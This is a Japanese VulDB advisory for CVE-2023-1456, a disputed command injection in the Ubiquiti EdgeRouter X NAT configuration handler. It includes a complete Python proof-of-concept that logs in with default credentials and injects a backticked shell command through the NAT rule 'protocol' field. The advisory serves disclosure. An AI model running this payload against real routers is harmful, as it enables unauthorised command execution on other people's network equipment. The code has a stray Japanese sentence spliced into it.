Ubiquiti EdgeRouter X 2.0.9-hotfix.6 NAT Configuration 特権昇格 ⚔ [係争中]
| CVSS 一時的なメタスコア | 現在のエクスプロイト価格 (≈) | CTI注目指数 |
|---|---|---|
| 7.8 | $0-$5k | 0.00 |
要約
脆弱性が重大として分類され、Ubiquiti EdgeRouter X 2.0.9-hotfix.6で発見されました。 影響を受けるのは、コンポーネント【NAT Configuration Handler】の未知の関数です。 この操作は、 特権昇格を引き起こします。 この脆弱性はCVE-2023-1456として取引されています。 攻撃はリモートで開始される場合があります。 さらに、悪用手段が存在します。 この脆弱性の実在は現時点ではまだ疑問視されています。
詳細
脆弱性が重大として分類され、Ubiquiti EdgeRouter X 2.0.9-hotfix.6で発見されました。 影響を受けるのは、コンポーネント【NAT Configuration Handler】の未知の関数です。 この操作は、 特権昇格を引き起こします。 CWEを使用して問題を宣言すると、CWE-77 につながります。 この脆弱性は 2023年03月17日に公開されました。
この脆弱性はCVE-2023-1456として取引されています。 攻撃はリモートで開始される場合があります。 技術詳細は存在しません。 この脆弱性の普及度は平均未満です。 さらに、悪用手段が存在します。 このエクスプロイトは一般に公開されており、利用される恐れがあります。 エクスプロイトツールの現在の価格はおそらく米ドルで約$0-$5kです。 この脆弱性は、MITRE ATT&CKプロジェクトによって T1202 に割り当てられました。
概念実証 として設定されています。 エクスプロイトツールは vuldb.com から入手可能です。 0-dayとして、アンダーグラウンドでの推定価格は$0-$5k程度でした。 このエクスプロイトが利用したコードは以下の通りです:
import requests import json import time import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)この脆弱性の実在は現時点ではまだ疑問視されています。username = 'ubnt' password = 'ubnt' device_web_ip = '192.168.1.1' ping_target = '192.168.1.5' inject_cmd = 'ping -c 1 ' + ping_target #inject_cmd = 'touch /etc/test'
phpsessid = '35a9f702c8c6486596c6b749a6fd9d1c' csrftoken = 'ca13a024a18598042d0d1323146ea18af8a44554eb8a68c7807a9cd6f5a6cca6' header ={ 'Host': '{}'.format(device_web_ip), 'User-Agent': 'dummy', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate, br', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '27', 'Origin': 'https://{}/'.format(device_web_ip), 'Connection': 'keep-alive', 'Referer': 'https://{}/'.format(device_web_ip), 'Cookie': 'PHPSESSID={0}; X-CSRF-TOKEN={1}; beaker.session.id={0}; ip_address_top_user_option=total_bytes'.format(phpsessid,csrftoken), 'Upgrade-Insecure-Requests': '1', 'Sec-Fetch-Dest': 'document', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-User': '?1' } login_body = 'username={}&password={}'.format(username,password) login_url = 'https://{}/'.format(device_web_ip)
loop = 3 r = None while loop>0: try: loop -= 1 r = requests.post(url=login_url,headers=header,data=login_body,\ timeout=5,verify=False,allow_redirects=False) if r is None or 'Set-Cookie' not in r.headers.keys(): print("Login failed.") time.sleep((3-loop)*3) else: break except Exception as e: print('Login error:{}'.format(e))
if r is None: print('Failed login,please check and retry!') exit(1)
tmp:dict = requests.utils.dict_from_cookiejar(r.cookies) for k,v in tmp.items(): if 'PHPSESSID' == k: phpsessid = '{}'.format(v) elif 'X-CSRF-TOKEN' == k: csrftoken = '{}'.format(v) elif 'beaker.session.id' == k: sessionid = '{}'.format(v) cookie = 'PHPSESSID={0}; X-CSRF-TOKEN={1}; beaker.session.id={0}; ip_address_top_user_option=total_bytes'.format(phpsessid,csrftoken)
param = {'SET': {'service': {'nat': {'rule': {'5000': {'type': 'source', 'description': 'dummy', 'log': 'enable', 'protocol': 'tcp`{}`'.format(inject_cmd), 'source': '', 'destination': {'address': '10.10.23.12', 'port': '998'}, 'outbound-interface': 'eth4'}}}}}, 'GET': {'service': {'nat': {'rule': {'5000': ''}}}}}
victim_url = 'https://{}/api/edge/batch.json'.format(device_web_ip) victim_body = json.dumps(param) victim_header = { 'Host': '{}'.format(device_web_ip), 'User-Agent': 'dummy', 'Accept': 'application/json, text/javascript, /; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate, br', 'Content-Type': 'application/json', 'X-CSRF-TOKEN': '{}'.format(csrftoken), 'X-Requested-With': 'XMLHttpRequest', 'Origin': 'https://{}/'.format(device_web_ip), 'Connection': 'keep-alive', 'Referer': 'https://{}/'.format(device_web_ip), 'Cookie': 'PHPSESSID={0};X-CSRF-TOKEN={1};ip_address_top_user_option=total_bytes;beaker.session.id={0}'.format(phpsessid,csrftoken), 'Sec-Fetch-Dest': 'empty', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Site': 'same-origin'} r = requests.post(url=victim_url,headers=victim_header,data=victim_body,\ timeout=5,verify=False,allow_redirects=False) print(r.status_code)
製品
タイプ
ベンダー
名前
バージョン
ライセンス
CPE 2.3
CPE 2.2
CVSSv4
VulDB ベクトル: 🔍VulDB 信頼性: 🔍
CVSSv3
VulDB ベースメタスコア: 8.1VulDB 一時的なメタスコア: 7.8
VulDB ベーススコア: 7.2
VulDB 一時的なスコア: 6.5
VulDB ベクトル: 🔍
VulDB 信頼性: 🔍
NVD ベーススコア: 9.8
NVD ベクトル: 🔍
CNA ベーススコア: 7.2
CNA ベクトル (VulDB): 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| ベクトル | 複雑さ | 認証 | 機密性 | 完全性 | 可用性 |
|---|---|---|---|---|---|
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
VulDB ベーススコア: 🔍
VulDB 一時的なスコア: 🔍
VulDB 信頼性: 🔍
NVD ベーススコア: 🔍
悪用
クラス: 特権昇格CWE: CWE-77 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍
物理的: いいえ
ローカル: いいえ
リモート: はい
可用性: 🔍
アクセス: パブリック
ステータス: 概念実証
ダウンロード: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
価格予測: 🔍
現在の価格評価: 🔍
| 0-Day | 解除 | 解除 | 解除 | 解除 |
|---|---|---|---|---|
| 本日 | 解除 | 解除 | 解除 | 解除 |
脅威インテリジェンス
関心: 🔍アクティブアクター: 🔍
アクティブなAPTグループ: 🔍
対策
推奨: 既知の緩和策なしステータス: 🔍
0day日時: 🔍
タイムライン
2023年03月17日 🔍2023年03月17日 🔍
2023年03月17日 🔍
2025年08月11日 🔍
ソース
ステータス: 未定義係争中: 🔍
CVE: CVE-2023-1456 (🔍)
GCVE (CVE): GCVE-0-2023-1456
GCVE (VulDB): GCVE-100-223301
EUVD: 🔍
scip Labs: https://www.scip.ch/en/?labs.20161013
エントリ
作成済み: 2023年03月17日 08:38更新済み: 2025年08月11日 07:30
変更: 2023年03月17日 08:38 (39), 2023年03月17日 08:39 (3), 2023年04月11日 11:40 (2), 2023年04月11日 11:47 (28), 2025年08月11日 07:30 (16)
完了: 🔍
提出者: leetmoon
Cache ID: 216::103
提出
承諾済み
- 提出 #99970: Command injection at the web management interface of EdgeRouter-x (〜によって leetmoon)
If you want to get the best quality for vulnerability data then you always have to consider VulDB.
コメントはまだありません。 言語: ja + en.
コメントするにはログインしてください。